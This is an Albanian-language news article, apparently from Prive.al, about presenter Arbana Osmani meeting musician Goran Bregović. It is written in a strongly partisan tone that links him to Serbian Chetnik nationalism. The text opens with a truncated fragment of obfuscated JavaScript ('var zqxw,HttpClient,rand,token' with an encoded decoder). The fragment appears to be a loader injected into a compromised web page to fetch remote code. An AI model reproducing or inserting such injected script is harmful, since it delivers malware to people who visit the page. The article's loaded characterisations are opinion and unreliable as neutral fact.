;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Prezantuesja e njohur shqiptare e emocionuar pas takimit me frymëzuesin e çetnikëve serbë

By

Në sytë e shumëkujt është simbol i inspirimit për çetnikët serbë në apetitin e tyre për spastrim etnik në Kosovë, Kroaci e Bosnje por ky fakt nuk ka paraqitur pengesë asnjë herë që shqiptarët nga Shqipëria, të ‘dehur’ të flasin në super lativa për serbin e Bosnës, Goran Bregovic.

Këngëtari që jehonën e muzikës së tij nuk e ndalte as në kohën e bombardimeve duke ushqyer utopinë serbe për marrjen e Kosovës, është nderuar gjithmonë në Shqipëri.

Kryeministri aktual, dikur i pari i Tiranës, Edi Rama i kishte dhënë çelësin e qytetit kurse Pandi Laço pati organizuar koncert, ku salla e mbushur, me lëvizje tipike të stilit koreano-verior në sinkron, çmendeshin për ‘Kallashnikov’ të Bregovicit sikur të kishin përpara Kim Jong Un.

Pavarësisht të gjithave, dashuria dhe nostalgjia për ‘vlerat e artistit’ nuk po shuhet në Shqipëri dhe e rradhës që ka shfaqur admirimin ka qenë prezantuesja Arbana Osmani.

Ajo ka pasur rastin ta takoj në Slloveni ku po xhiron pjesë nga emisioni i ri dhe ky rast nuk ka kaluar pa një foto.

Me buzëqeshjen vesh më vesh krah Bregovicit, prezantuesja e njohur madje nuk është kursyer në epitete. ‘Vajzë me fat’ – e ka konsideruar veten Arbana për mundësinë e takimit me atë që konsiderohet si frymëzuesi i çetnikëve serb, Goran Bregovic.

Për historinë e re, përpos asaj që e dimë në të 90-tat, Bregovic me një koncert në Krimenë e aneksuar nga Rusia së fundmi përkrahu tendencat shoviniste gllabëruese teksa në Poloni Life Festival, në Prill të 2015-tës ia ndaloi pjesëmarrjen nën arsyetimin se me deklaratat e tij, bie ndesh me vlerat që promovon eventi. Prive.al/

Artikuj të ngjashëm